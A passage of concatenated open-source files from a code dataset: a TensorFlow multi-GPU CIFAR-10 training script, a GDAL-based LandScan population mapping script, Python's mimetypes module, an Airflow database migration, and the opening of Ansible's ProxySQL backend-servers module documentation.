3 Tesla K20m | 0.13-0.18 | ~84% at 30K steps
4 Tesla K20m | ~0.10 | ~84% at 30K steps
Usage:
Please see the tutorial and website for how to download the CIFAR-10
data set, compile the program and train the model.
http://tensorflow.org/tutorials/deep_cnn/
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import os.path
import re
import time
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
import tensorflow as tf
from tensorflow.models.image.cifar10 import cifar10
FLAGS = tf.app.flags.FLAGS
tf.app.flags.DEFINE_string('train_dir', '/tmp/cifar10_train',
"""Directory where to write event logs """
"""and checkpoint.""")
tf.app.flags.DEFINE_integer('max_steps', 1000000,
"""Number of batches to run.""")
tf.app.flags.DEFINE_integer('num_gpus', 1,
"""How many GPUs to use.""")
tf.app.flags.DEFINE_boolean('log_device_placement', False,
"""Whether to log device placement.""")
def tower_loss(scope):
"""Calculate the total loss on a single tower running the CIFAR model.
Args:
scope: unique prefix string identifying the CIFAR tower, e.g. 'tower_0'
Returns:
Tensor of shape [] containing the total loss for a batch of data
"""
# Get images and labels for CIFAR-10.
images, labels = cifar10.distorted_inputs()
# Build inference Graph.
logits = cifar10.inference(images)
# Build the portion of the Graph calculating the losses. Note that we will
# assemble the total_loss using a custom function below.
_ = cifar10.loss(logits, labels)
# Assemble all of the losses for the current tower only.
losses = tf.get_collection('losses', scope)
# Calculate the total loss for the current tower.
total_loss = tf.add_n(losses, name='total_loss')
# Compute the moving average of all individual losses and the total loss.
loss_averages = tf.train.ExponentialMovingAverage(0.9, name='avg')
loss_averages_op = loss_averages.apply(losses + [total_loss])
# Attach a scalar summary to all individual losses and the total loss; do the
# same for the averaged version of the losses.
for l in losses + [total_loss]:
# Remove 'tower_[0-9]/' from the name in case this is a multi-GPU training
# session. This helps the clarity of presentation on tensorboard.
loss_name = re.sub('%s_[0-9]*/' % cifar10.TOWER_NAME, '', l.op.name)
# Name each loss as '(raw)' and name the moving average version of the loss
# as the original loss name.
tf.scalar_summary(loss_name +' (raw)', l)
tf.scalar_summary(loss_name, loss_averages.average(l))
with tf.control_dependencies([loss_averages_op]):
total_loss = tf.identity(total_loss)
return total_loss
def average_gradients(tower_grads):
"""Calculate the average gradient for each shared variable across all towers.
Note that this function provides a synchronization point across all towers.
Args:
tower_grads: List of lists of (gradient, variable) tuples. The outer list
is over individual gradients. The inner list is over the gradient
calculation for each tower.
Returns:
List of pairs of (gradient, variable) where the gradient has been averaged
across all towers.
"""
average_grads = []
for grad_and_vars in zip(*tower_grads):
# Note that each grad_and_vars looks like the following:
# ((grad0_gpu0, var0_gpu0), ... , (grad0_gpuN, var0_gpuN))
grads = []
for g, _ in grad_and_vars:
# Add 0 dimension to the gradients to represent the tower.
expanded_g = tf.expand_dims(g, 0)
# Append on a 'tower' dimension which we will average over below.
grads.append(expanded_g)
# Average over the 'tower' dimension.
grad = tf.concat(0, grads)
grad = tf.reduce_mean(grad, 0)
# Keep in mind that the Variables are redundant because they are shared
# across towers. So .. we will just return the first tower's pointer to
# the Variable.
v = grad_and_vars[0][1]
grad_and_var = (grad, v)
average_grads.append(grad_and_var)
return average_grads
def train():
"""Train CIFAR-10 for a number of steps."""
with tf.Graph().as_default(), tf.device('/cpu:0'):
# Create a variable to count the number of train() calls. This equals the
# number of batches processed * FLAGS.num_gpus.
global_step = tf.get_variable(
'global_step', [],
initializer=tf.constant_initializer(0), trainable=False)
# Calculate the learning rate schedule.
num_batches_per_epoch = (cifar10.NUM_EXAMPLES_PER_EPOCH_FOR_TRAIN /
FLAGS.batch_size)
decay_steps = int(num_batches_per_epoch * cifar10.NUM_EPOCHS_PER_DECAY)
# Decay the learning rate exponentially based on the number of steps.
lr = tf.train.exponential_decay(cifar10.INITIAL_LEARNING_RATE,
global_step,
decay_steps,
cifar10.LEARNING_RATE_DECAY_FACTOR,
staircase=True)
# Create an optimizer that performs gradient descent.
opt = tf.train.GradientDescentOptimizer(lr)
# Calculate the gradients for each model tower.
tower_grads = []
for i in xrange(FLAGS.num_gpus):
with tf.device('/gpu:%d' % i):
with tf.name_scope('%s_%d' % (cifar10.TOWER_NAME, i)) as scope:
# Calculate the loss for one tower of the CIFAR model. This function
# constructs the entire CIFAR model but shares the variables across
# all towers.
loss = tower_loss(scope)
# Reuse variables for the next tower.
tf.get_variable_scope().reuse_variables()
# Retain the summaries from the final tower.
summaries = tf.get_collection(tf.GraphKeys.SUMMARIES, scope)
# Calculate the gradients for the batch of data on this CIFAR tower.
grads = opt.compute_gradients(loss)
# Keep track of the gradients across all towers.
tower_grads.append(grads)
# We must calculate the mean of each gradient. Note that this is the
# synchronization point across all towers.
grads = average_gradients(tower_grads)
# Add a summary to track the learning rate.
summaries.append(tf.scalar_summary('learning_rate', lr))
# Add histograms for gradients.
for grad, var in grads:
if grad is not None:
summaries.append(
tf.histogram_summary(var.op.name + '/gradients', grad))
# Apply the gradients to adjust the shared variables.
apply_gradient_op = opt.apply_gradients(grads, global_step=global_step)
# Add histograms for trainable variables.
for var in tf.trainable_variables():
summaries.append(tf.histogram_summary(var.op.name, var))
# Track the moving averages of all trainable variables.
variable_averages = tf.train.ExponentialMovingAverage(
cifar10.MOVING_AVERAGE_DECAY, global_step)
variables_averages_op = variable_averages.apply(tf.trainable_variables())
# Group all updates to into a single train op.
train_op = tf.group(apply_gradient_op, variables_averages_op)
# Create a saver.
saver = tf.train.Saver(tf.all_variables())
# Build the summary operation from the last tower summaries.
summary_op = tf.merge_summary(summaries)
# Build an initialization operation to run below.
init = tf.initialize_all_variables()
# Start running operations on the Graph. allow_soft_placement must be set to
# True to build towers on GPU, as some of the ops do not have GPU
# implementations.
sess = tf.Session(config=tf.ConfigProto(
allow_soft_placement=True,
log_device_placement=FLAGS.log_device_placement))
sess.run(init)
# Start the queue runners.
tf.train.start_queue_runners(sess=sess)
summary_writer = tf.train.SummaryWriter(FLAGS.train_dir, sess.graph)
for step in xrange(FLAGS.max_steps):
start_time = time.time()
_, loss_value = sess.run([train_op, loss])
duration = time.time() - start_time
assert not np.isnan(loss_value), 'Model diverged with loss = NaN'
if step % 10 == 0:
num_examples_per_step = FLAGS.batch_size * FLAGS.num_gpus
examples_per_sec = num_examples_per_step / duration
sec_per_batch = duration / FLAGS.num_gpus
format_str = ('%s: step %d, loss = %.2f (%.1f examples/sec; %.3f '
'sec/batch)')
print (format_str % (datetime.now(), step, loss_value,
examples_per_sec, sec_per_batch))
if step % 100 == 0:
summary_str = sess.run(summary_op)
summary_writer.add_summary(summary_str, step)
# Save the model checkpoint periodically.
if step % 1000 == 0 or (step + 1) == FLAGS.max_steps:
checkpoint_path = os.path.join(FLAGS.train_dir, 'model.ckpt')
saver.save(sess, checkpoint_path, global_step=step)
def main(argv=None): # pylint: disable=unused-argument
cifar10.maybe_download_and_extract()
if tf.gfile.Exists(FLAGS.train_dir):
tf.gfile.DeleteRecursively(FLAGS.train_dir)
tf.gfile.MakeDirs(FLAGS.train_dir)
train()
if __name__ == '__main__':
tf.app.run()
| apache-2.0 |
pmav99/FloodMapsWorkshop | python/landscan.py | 3 | 4766 | #!/usr/bin/env python
#
# Created on 7/5/2013 Pat Cappelaere - Vightel Corporation
#
# Requirements:
# gdal...
#
# Requires 2011 LandScan EPSG:4326
# cd [ls]/LandScan-2011/ArcGIS/Population
# gdalwarp lspop2011 -t_srs EPSG:4326 -of GTIFF lspop2011_4326.tif
#
import os, inspect, sys
import argparse
from osgeo import gdal
from osgeo import osr
from osgeo import ogr
import config
import json
from browseimage import MakeBrowseImage
from s3 import CopyToS3
from level import CreateLevel
force = 0
verbose = 0
BASE_DIR = config.LS_DIR
def execute( cmd ):
if verbose:
print cmd
os.system(cmd)
def process(mydir, lsFile, regionName, region, s3_bucket, s3_folder):
scene = regionName
subsetFileName = os.path.join(mydir, "ls.2011_subset.tif")
if force or not os.path.exists(subsetFileName):
bbox = region['bbox']
print region['name'], region['bbox']
warpOptions = "-q -overwrite -co COMPRESS=DEFLATE -t_srs EPSG:4326 -te %s %s %s %s " % (bbox[0], bbox[1], bbox[2], bbox[3])
warpCmd = 'gdalwarp ' + warpOptions + lsFile + ' ' + subsetFileName
execute( warpCmd )
if verbose:
print "LS Subset", subsetFileName
if verbose:
print "Processing", subsetFileName
geojsonDir = os.path.join(mydir,"geojson")
if not os.path.exists(geojsonDir):
os.makedirs(geojsonDir)
levelsDir = os.path.join(mydir,"levels")
if not os.path.exists(levelsDir):
os.makedirs(levelsDir)
merge_filename = os.path.join(geojsonDir, "%s_levels.geojson" % scene)
topojson_filename = os.path.join(geojsonDir, "..", "ls.2011.topojson" )
browse_filename = os.path.join(geojsonDir, "..", "ls.2011_browse.tif" )
subset_filename = os.path.join(geojsonDir, "..", "ls.2011_small_browse.tif" )
osm_bg_image = os.path.join(geojsonDir, "..", "osm_bg.png")
sw_osm_image = os.path.join(geojsonDir, "..", "ls.2011_thn.jpg" )
levels = [ 5500, 3400, 2100, 1300, 800, 500, 300, 200, 100 ]
# From http://colorbrewer2.org/
hexColors = [ "#f7f4f9", "#e7e1ef", "#d4b9da", "#c994c7", "#df65b0", "#e7298a", "#ce1256", "#980043", "#67001f"]
ds = gdal.Open( subsetFileName )
band = ds.GetRasterBand(1)
data = band.ReadAsArray(0, 0, ds.RasterXSize, ds.RasterYSize )
if force or not os.path.exists(topojson_filename+".gz"):
for l in levels:
fileName = os.path.join(levelsDir, scene+"_level_%d.tif"%l)
CreateLevel(l, geojsonDir, fileName, ds, data, "population", force,verbose)
jsonDict = dict(type='FeatureCollection', features=[])
for l in reversed(levels):
fileName = os.path.join(geojsonDir, "population_level_%d.geojson"%l)
if os.path.exists(fileName):
print "merge", fileName
with open(fileName) as data_file:
data = json.load(data_file)
if 'features' in data:
for f in data['features']:
jsonDict['features'].append(f)
with open(merge_filename, 'w') as outfile:
json.dump(jsonDict, outfile)
# Convert to topojson
cmd = "topojson -p -o "+ topojson_filename + " " + merge_filename
execute(cmd)
cmd = "gzip --keep "+ topojson_filename
execute(cmd)
if force or not os.path.exists(sw_osm_image):
zoom = region['thn_zoom']
MakeBrowseImage(ds, browse_filename, subset_filename, osm_bg_image, sw_osm_image,levels, hexColors, force, verbose, zoom)
ds = None
file_list = [ sw_osm_image, topojson_filename, topojson_filename+".gz", subsetFileName ]
CopyToS3( s3_bucket, s3_folder, file_list, force, verbose )
#
# python landscan.py --region d04 -v -f
#
if __name__ == '__main__':
version_num = int(gdal.VersionInfo('VERSION_NUM'))
if version_num < 1800: # because of GetGeoTransform(can_return_null)
print('ERROR: Python bindings of GDAL 1.8.0 or later required')
sys.exit(1)
parser = argparse.ArgumentParser(description='Generate Population Density')
apg_input = parser.add_argument_group('Input')
apg_input.add_argument("-f", "--force", action='store_true', help="forces new product to be generated")
apg_input.add_argument("-v", "--verbose", action='store_true', help="Verbose on/off")
apg_input.add_argument("-r", "--region", help="region name")
options = parser.parse_args()
force = options.force
verbose = options.verbose
regionName = options.region
# Landscan directory
lsFile = "/Volumes/MacBay3/GeoData/ls/LandScan-2011/ArcGIS/Population/lspop2011_4326.tif"
region = config.regions[regionName]
year = 2011
s3_folder = os.path.join("ls", str(year))
s3_bucket = region['bucket']
if not os.path.exists(lsFile):
print "Landscan file does not exist", lsFile
sys.exit(-1)
ls_dir = os.path.join(BASE_DIR,str(year), regionName)
if not os.path.exists(ls_dir):
os.makedirs(ls_dir)
process(ls_dir, lsFile, regionName, region, s3_bucket, s3_folder) | apache-2.0 |
RiccardoPecora/MP | Lib/mimetypes.py | 53 | 21200 | """Guess the MIME type of a file.
This module defines two useful functions:
guess_type(url, strict=1) -- guess the MIME type and encoding of a URL.
guess_extension(type, strict=1) -- guess the extension for a given MIME type.
It also contains the following, for tuning the behavior:
Data:
knownfiles -- list of files to parse
inited -- flag set when init() has been called
suffix_map -- dictionary mapping suffixes to suffixes
encodings_map -- dictionary mapping suffixes to encodings
types_map -- dictionary mapping suffixes to types
Functions:
init([files]) -- parse a list of files, default knownfiles (on Windows, the
default values are taken from the registry)
read_mime_types(file) -- parse one file, return a dictionary or None
"""
import os
import sys
import posixpath
import urllib
try:
import _winreg
except ImportError:
_winreg = None
__all__ = [
"guess_type","guess_extension","guess_all_extensions",
"add_type","read_mime_types","init"
]
knownfiles = [
"/etc/mime.types",
"/etc/httpd/mime.types", # Mac OS X
"/etc/httpd/conf/mime.types", # Apache
"/etc/apache/mime.types", # Apache 1
"/etc/apache2/mime.types", # Apache 2
"/usr/local/etc/httpd/conf/mime.types",
"/usr/local/lib/netscape/mime.types",
"/usr/local/etc/httpd/conf/mime.types", # Apache 1.2
"/usr/local/etc/mime.types", # Apache 1.3
]
inited = False
_db = None
class MimeTypes:
"""MIME-types datastore.
This datastore can handle information from mime.types-style files
and supports basic determination of MIME type from a filename or
URL, and can guess a reasonable extension given a MIME type.
"""
def __init__(self, filenames=(), strict=True):
if not inited:
init()
self.encodings_map = encodings_map.copy()
self.suffix_map = suffix_map.copy()
self.types_map = ({}, {}) # dict for (non-strict, strict)
self.types_map_inv = ({}, {})
for (ext, type) in types_map.items():
self.add_type(type, ext, True)
for (ext, type) in common_types.items():
self.add_type(type, ext, False)
for name in filenames:
self.read(name, strict)
def add_type(self, type, ext, strict=True):
"""Add a mapping between a type and an extension.
When the extension is already known, the new
type will replace the old one. When the type
is already known the extension will be added
to the list of known extensions.
If strict is true, information will be added to
list of standard types, else to the list of non-standard
types.
"""
self.types_map[strict][ext] = type
exts = self.types_map_inv[strict].setdefault(type, [])
if ext not in exts:
exts.append(ext)
def guess_type(self, url, strict=True):
"""Guess the type of a file based on its URL.
Return value is a tuple (type, encoding) where type is None if
the type can't be guessed (no or unknown suffix) or a string
of the form type/subtype, usable for a MIME Content-type
header; and encoding is None for no encoding or the name of
the program used to encode (e.g. compress or gzip). The
mappings are table driven. Encoding suffixes are case
sensitive; type suffixes are first tried case sensitive, then
case insensitive.
The suffixes .tgz, .taz and .tz (case sensitive!) are all
mapped to '.tar.gz'. (This is table-driven too, using the
dictionary suffix_map.)
Optional `strict' argument when False adds a bunch of commonly found,
but non-standard types.
"""
scheme, url = urllib.splittype(url)
if scheme == 'data':
# syntax of data URLs:
# dataurl := "data:" [ mediatype ] [ ";base64" ] "," data
# mediatype := [ type "/" subtype ] *( ";" parameter )
# data := *urlchar
# parameter := attribute "=" value
# type/subtype defaults to "text/plain"
comma = url.find(',')
if comma < 0:
# bad data URL
return None, None
semi = url.find(';', 0, comma)
if semi >= 0:
type = url[:semi]
else:
type = url[:comma]
if '=' in type or '/' not in type:
type = 'text/plain'
return type, None # never compressed, so encoding is None
base, ext = posixpath.splitext(url)
while ext in self.suffix_map:
base, ext = posixpath.splitext(base + self.suffix_map[ext])
if ext in self.encodings_map:
encoding = self.encodings_map[ext]
base, ext = posixpath.splitext(base)
else:
encoding = None
types_map = self.types_map[True]
if ext in types_map:
return types_map[ext], encoding
elif ext.lower() in types_map:
return types_map[ext.lower()], encoding
elif strict:
return None, encoding
types_map = self.types_map[False]
if ext in types_map:
return types_map[ext], encoding
elif ext.lower() in types_map:
return types_map[ext.lower()], encoding
else:
return None, encoding
def guess_all_extensions(self, type, strict=True):
"""Guess the extensions for a file based on its MIME type.
Return value is a list of strings giving the possible filename
extensions, including the leading dot ('.'). The extension is not
guaranteed to have been associated with any particular data stream,
but would be mapped to the MIME type `type' by guess_type().
Optional `strict' argument when false adds a bunch of commonly found,
but non-standard types.
"""
type = type.lower()
extensions = self.types_map_inv[True].get(type, [])
if not strict:
for ext in self.types_map_inv[False].get(type, []):
if ext not in extensions:
extensions.append(ext)
return extensions
def guess_extension(self, type, strict=True):
"""Guess the extension for a file based on its MIME type.
Return value is a string giving a filename extension,
including the leading dot ('.'). The extension is not
guaranteed to have been associated with any particular data
stream, but would be mapped to the MIME type `type' by
guess_type(). If no extension can be guessed for `type', None
is returned.
Optional `strict' argument when false adds a bunch of commonly found,
but non-standard types.
"""
extensions = self.guess_all_extensions(type, strict)
if not extensions:
return None
return extensions[0]
def read(self, filename, strict=True):
"""
Read a single mime.types-format file, specified by pathname.
If strict is true, information will be added to
list of standard types, else to the list of non-standard
types.
"""
with open(filename) as fp:
self.readfp(fp, strict)
def readfp(self, fp, strict=True):
"""
Read a single mime.types-format file.
If strict is true, information will be added to
list of standard types, else to the list of non-standard
types.
"""
while 1:
line = fp.readline()
if not line:
break
words = line.split()
for i in range(len(words)):
if words[i][0] == '#':
del words[i:]
break
if not words:
continue
type, suffixes = words[0], words[1:]
for suff in suffixes:
self.add_type(type, '.' + suff, strict)
def read_windows_registry(self, strict=True):
"""
Load the MIME types database from Windows registry.
If strict is true, information will be added to
list of standard types, else to the list of non-standard
types.
"""
# Windows only
if not _winreg:
return
def enum_types(mimedb):
i = 0
while True:
try:
ctype = _winreg.EnumKey(mimedb, i)
except EnvironmentError:
break
try:
ctype = ctype.encode(default_encoding) # omit in 3.x!
except UnicodeEncodeError:
pass
else:
yield ctype
i += 1
default_encoding = sys.getdefaultencoding()
with _winreg.OpenKey(_winreg.HKEY_CLASSES_ROOT,
r'MIME\Database\Content Type') as mimedb:
for ctype in enum_types(mimedb):
try:
with _winreg.OpenKey(mimedb, ctype) as key:
suffix, datatype = _winreg.QueryValueEx(key,
'Extension')
except EnvironmentError:
continue
if datatype != _winreg.REG_SZ:
continue
try:
suffix = suffix.encode(default_encoding) # omit in 3.x!
except UnicodeEncodeError:
continue
self.add_type(ctype, suffix, strict)
def guess_type(url, strict=True):
"""Guess the type of a file based on its URL.
Return value is a tuple (type, encoding) where type is None if the
type can't be guessed (no or unknown suffix) or a string of the
form type/subtype, usable for a MIME Content-type header; and
encoding is None for no encoding or the name of the program used
to encode (e.g. compress or gzip). The mappings are table
driven. Encoding suffixes are case sensitive; type suffixes are
first tried case sensitive, then case insensitive.
The suffixes .tgz, .taz and .tz (case sensitive!) are all mapped
to ".tar.gz". (This is table-driven too, using the dictionary
suffix_map).
Optional `strict' argument when false adds a bunch of commonly found, but
non-standard types.
"""
if _db is None:
init()
return _db.guess_type(url, strict)
def guess_all_extensions(type, strict=True):
"""Guess the extensions for a file based on its MIME type.
Return value is a list of strings giving the possible filename
extensions, including the leading dot ('.'). The extension is not
guaranteed to have been associated with any particular data
stream, but would be mapped to the MIME type `type' by
guess_type(). If no extension can be guessed for `type', None
is returned.
Optional `strict' argument when false adds a bunch of commonly found,
but non-standard types.
"""
if _db is None:
init()
return _db.guess_all_extensions(type, strict)
def guess_extension(type, strict=True):
"""Guess the extension for a file based on its MIME type.
Return value is a string giving a filename extension, including the
leading dot ('.'). The extension is not guaranteed to have been
associated with any particular data stream, but would be mapped to the
MIME type `type' by guess_type(). If no extension can be guessed for
`type', None is returned.
Optional `strict' argument when false adds a bunch of commonly found,
but non-standard types.
"""
if _db is None:
init()
return _db.guess_extension(type, strict)
def add_type(type, ext, strict=True):
"""Add a mapping between a type and an extension.
When the extension is already known, the new
type will replace the old one. When the type
is already known the extension will be added
to the list of known extensions.
If strict is true, information will be added to
list of standard types, else to the list of non-standard
types.
"""
if _db is None:
init()
return _db.add_type(type, ext, strict)
def init(files=None):
global suffix_map, types_map, encodings_map, common_types
global inited, _db
inited = True # so that MimeTypes.__init__() doesn't call us again
db = MimeTypes()
if files is None:
if _winreg:
db.read_windows_registry()
files = knownfiles
for file in files:
if os.path.isfile(file):
db.read(file)
encodings_map = db.encodings_map
suffix_map = db.suffix_map
types_map = db.types_map[True]
common_types = db.types_map[False]
# Make the DB a global variable now that it is fully initialized
_db = db
def read_mime_types(file):
try:
f = open(file)
except IOError:
return None
db = MimeTypes()
db.readfp(f, True)
return db.types_map[True]
def _default_mime_types():
global suffix_map
global encodings_map
global types_map
global common_types
suffix_map = {
'.tgz': '.tar.gz',
'.taz': '.tar.gz',
'.tz': '.tar.gz',
'.tbz2': '.tar.bz2',
}
encodings_map = {
'.gz': 'gzip',
'.Z': 'compress',
'.bz2': 'bzip2',
}
# Before adding new types, make sure they are either registered with IANA,
# at http://www.isi.edu/in-notes/iana/assignments/media-types
# or extensions, i.e. using the x- prefix
# If you add to these, please keep them sorted!
types_map = {
'.a' : 'application/octet-stream',
'.ai' : 'application/postscript',
'.aif' : 'audio/x-aiff',
'.aifc' : 'audio/x-aiff',
'.aiff' : 'audio/x-aiff',
'.au' : 'audio/basic',
'.avi' : 'video/x-msvideo',
'.bat' : 'text/plain',
'.bcpio' : 'application/x-bcpio',
'.bin' : 'application/octet-stream',
'.bmp' : 'image/x-ms-bmp',
'.c' : 'text/plain',
# Duplicates :(
'.cdf' : 'application/x-cdf',
'.cdf' : 'application/x-netcdf',
'.cpio' : 'application/x-cpio',
'.csh' : 'application/x-csh',
'.css' : 'text/css',
'.dll' : 'application/octet-stream',
'.doc' : 'application/msword',
'.dot' : 'application/msword',
'.dvi' : 'application/x-dvi',
'.eml' : 'message/rfc822',
'.eps' : 'application/postscript',
'.etx' : 'text/x-setext',
'.exe' : 'application/octet-stream',
'.gif' : 'image/gif',
'.gtar' : 'application/x-gtar',
'.h' : 'text/plain',
'.hdf' : 'application/x-hdf',
'.htm' : 'text/html',
'.html' : 'text/html',
'.ief' : 'image/ief',
'.jpe' : 'image/jpeg',
'.jpeg' : 'image/jpeg',
'.jpg' : 'image/jpeg',
'.js' : 'application/x-javascript',
'.ksh' : 'text/plain',
'.latex' : 'application/x-latex',
'.m1v' : 'video/mpeg',
'.man' : 'application/x-troff-man',
'.me' : 'application/x-troff-me',
'.mht' : 'message/rfc822',
'.mhtml' : 'message/rfc822',
'.mif' : 'application/x-mif',
'.mov' : 'video/quicktime',
'.movie' : 'video/x-sgi-movie',
'.mp2' : 'audio/mpeg',
'.mp3' : 'audio/mpeg',
'.mp4' : 'video/mp4',
'.mpa' : 'video/mpeg',
'.mpe' : 'video/mpeg',
'.mpeg' : 'video/mpeg',
'.mpg' : 'video/mpeg',
'.ms' : 'application/x-troff-ms',
'.nc' : 'application/x-netcdf',
'.nws' : 'message/rfc822',
'.o' : 'application/octet-stream',
'.obj' : 'application/octet-stream',
'.oda' : 'application/oda',
'.p12' : 'application/x-pkcs12',
'.p7c' : 'application/pkcs7-mime',
'.pbm' : 'image/x-portable-bitmap',
'.pdf' : 'application/pdf',
'.pfx' : 'application/x-pkcs12',
'.pgm' : 'image/x-portable-graymap',
'.pl' : 'text/plain',
'.png' : 'image/png',
'.pnm' : 'image/x-portable-anymap',
'.pot' : 'application/vnd.ms-powerpoint',
'.ppa' : 'application/vnd.ms-powerpoint',
'.ppm' : 'image/x-portable-pixmap',
'.pps' : 'application/vnd.ms-powerpoint',
'.ppt' : 'application/vnd.ms-powerpoint',
'.ps' : 'application/postscript',
'.pwz' : 'application/vnd.ms-powerpoint',
'.py' : 'text/x-python',
'.pyc' : 'application/x-python-code',
'.pyo' : 'application/x-python-code',
'.qt' : 'video/quicktime',
'.ra' : 'audio/x-pn-realaudio',
'.ram' : 'application/x-pn-realaudio',
'.ras' : 'image/x-cmu-raster',
'.rdf' : 'application/xml',
'.rgb' : 'image/x-rgb',
'.roff' : 'application/x-troff',
'.rtx' : 'text/richtext',
'.sgm' : 'text/x-sgml',
'.sgml' : 'text/x-sgml',
'.sh' : 'application/x-sh',
'.shar' : 'application/x-shar',
'.snd' : 'audio/basic',
'.so' : 'application/octet-stream',
'.src' : 'application/x-wais-source',
'.sv4cpio': 'application/x-sv4cpio',
'.sv4crc' : 'application/x-sv4crc',
'.swf' : 'application/x-shockwave-flash',
'.t' : 'application/x-troff',
'.tar' : 'application/x-tar',
'.tcl' : 'application/x-tcl',
'.tex' : 'application/x-tex',
'.texi' : 'application/x-texinfo',
'.texinfo': 'application/x-texinfo',
'.tif' : 'image/tiff',
'.tiff' : 'image/tiff',
'.tr' : 'application/x-troff',
'.tsv' : 'text/tab-separated-values',
'.txt' : 'text/plain',
'.ustar' : 'application/x-ustar',
'.vcf' : 'text/x-vcard',
'.wav' : 'audio/x-wav',
'.wiz' : 'application/msword',
'.wsdl' : 'application/xml',
'.xbm' : 'image/x-xbitmap',
'.xlb' : 'application/vnd.ms-excel',
# Duplicates :(
'.xls' : 'application/excel',
'.xls' : 'application/vnd.ms-excel',
'.xml' : 'text/xml',
'.xpdl' : 'application/xml',
'.xpm' : 'image/x-xpixmap',
'.xsl' : 'application/xml',
'.xwd' : 'image/x-xwindowdump',
'.zip' : 'application/zip',
}
# These are non-standard types, commonly found in the wild. They will
# only match if strict=0 flag is given to the API methods.
# Please sort these too
common_types = {
'.jpg' : 'image/jpg',
'.mid' : 'audio/midi',
'.midi': 'audio/midi',
'.pct' : 'image/pict',
'.pic' : 'image/pict',
'.pict': 'image/pict',
'.rtf' : 'application/rtf',
'.xul' : 'text/xul'
}
_default_mime_types()
if __name__ == '__main__':
import getopt
USAGE = """\
Usage: mimetypes.py [options] type
Options:
--help / -h -- print this message and exit
--lenient / -l -- additionally search of some common, but non-standard
types.
--extension / -e -- guess extension instead of type
More than one type argument may be given.
"""
def usage(code, msg=''):
print USAGE
if msg: print msg
sys.exit(code)
try:
opts, args = getopt.getopt(sys.argv[1:], 'hle',
['help', 'lenient', 'extension'])
except getopt.error, msg:
usage(1, msg)
strict = 1
extension = 0
for opt, arg in opts:
if opt in ('-h', '--help'):
usage(0)
elif opt in ('-l', '--lenient'):
strict = 0
elif opt in ('-e', '--extension'):
extension = 1
for gtype in args:
if extension:
guess = guess_extension(gtype, strict)
if not guess: print "I don't know anything about type", gtype
else: print guess
else:
guess, encoding = guess_type(gtype, strict)
if not guess: print "I don't know anything about type", gtype
else: print 'type:', guess, 'encoding:', encoding
| gpl-3.0 |
wooga/airflow | airflow/migrations/versions/64de9cddf6c9_add_task_fails_journal_table.py | 3 | 1781 | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""add task fails journal table
Revision ID: 64de9cddf6c9
Revises: 211e584da130
Create Date: 2016-08-03 14:02:59.203021
"""
import sqlalchemy as sa
from alembic import op
# revision identifiers, used by Alembic.
from airflow.models.base import COLLATION_ARGS
revision = '64de9cddf6c9'
down_revision = '211e584da130'
branch_labels = None
depends_on = None
def upgrade():
op.create_table(
'task_fail',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('task_id', sa.String(length=250, **COLLATION_ARGS), nullable=False),
sa.Column('dag_id', sa.String(length=250, **COLLATION_ARGS), nullable=False),
sa.Column('execution_date', sa.DateTime(), nullable=False),
sa.Column('start_date', sa.DateTime(), nullable=True),
sa.Column('end_date', sa.DateTime(), nullable=True),
sa.Column('duration', sa.Integer(), nullable=True),
sa.PrimaryKeyConstraint('id'),
)
def downgrade():
op.drop_table('task_fail')
| apache-2.0 |
jhawkesworth/ansible | lib/ansible/modules/database/proxysql/proxysql_backend_servers.py | 36 | 17633 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2017, Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
DOCUMENTATION = '''
---
module: proxysql_backend_servers
version_added: "2.3"
author: "Ben Mildren (@bmildren)"
short_description: Adds or removes mysql hosts from proxysql admin interface.
description:
- The M(proxysql_backend_servers) module adds or removes mysql hosts using
the proxysql admin interface.
options:
hostgroup_id:
description:
- The hostgroup in which this mysqld instance is included. An instance
can be part of one or more hostgroups.
default: 0
hostname:
description:
- The ip address at which the mysqld instance can be contacted.
required: True
port:
description:
- The port at which the mysqld instance can be contacted.
default: 3306
status:
description:
- ONLINE - Backend server is fully operational.
OFFLINE_SOFT - When a server is put into C(OFFLINE_SOFT) mode,
connections are kept in use until the current
transaction is completed. This allows to gracefully
detach a backend.
OFFLINE_HARD - When a server is put into C(OFFLINE_HARD) mode, the
existing connections are dropped, while new incoming
connections aren't accepted either.
If omitted the proxysql database default for I(status) is C(ONLINE).
choices: [ "ONLINE", "OFFLINE_SOFT", "OFFLINE_HARD"]
weight:
description:
- The bigger the weight of a server relative to other weights, the higher
the probability of the server being chosen from the hostgroup. If
omitted the proxysql database default for I(weight) is 1.
compression:
description:
- If the value of I(compression) is greater than 0, new connections to
that server will use compression. If omitted the proxysql database
default for I(compression) is 0.
max_connections:
description:
- The maximum number of connections ProxySQL will open to this backend
server. If omitted the proxysql database default for I(max_connections)
is 1000.
max_replication_lag:
description:
- If greater than 0, ProxySQL will reguarly monitor replication lag. If
replication lag goes above I(max_replication_lag), proxysql will
temporarily shun the server until replication catches up. If omitted
the proxysql database default for I(max_replication_lag) is 0.
use_ssl:
description:
- If I(use_ssl) is set to C(True), connections to this server will be
made using SSL connections. If omitted the proxysql database default
for I(use_ssl) is C(False).
type: bool
max_latency_ms:
description:
- Ping time is monitored regularly. If a host has a ping time greater
than I(max_latency_ms) it is excluded from the connection pool
(although the server stays ONLINE). If omitted the proxysql database
default for I(max_latency_ms) is 0.
comment:
description:
- Text field that can be used for any purposed defined by the user.
Could be a description of what the host stores, a reminder of when the
host was added or disabled, or a JSON processed by some checker script.
default: ''
state:
description:
- When C(present) - adds the host, when C(absent) - removes the host.
choices: [ "present", "absent" ]
default: present
extends_documentation_fragment:
- proxysql.managing_config
- proxysql.connectivity
'''
EXAMPLES = '''
---
# This example adds a server, it saves the mysql server config to disk, but
# avoids loading the mysql server config to runtime (this might be because
